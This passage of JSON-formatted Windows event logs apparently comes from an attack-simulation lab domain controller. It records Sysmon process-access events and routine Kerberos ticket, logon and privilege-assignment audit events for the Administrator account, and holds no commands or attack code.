C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5475,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220654,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220655,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220656,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220657,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA78C6\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa78c6","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220658,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA78C6\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa78c6","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5476,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5477,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5478,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
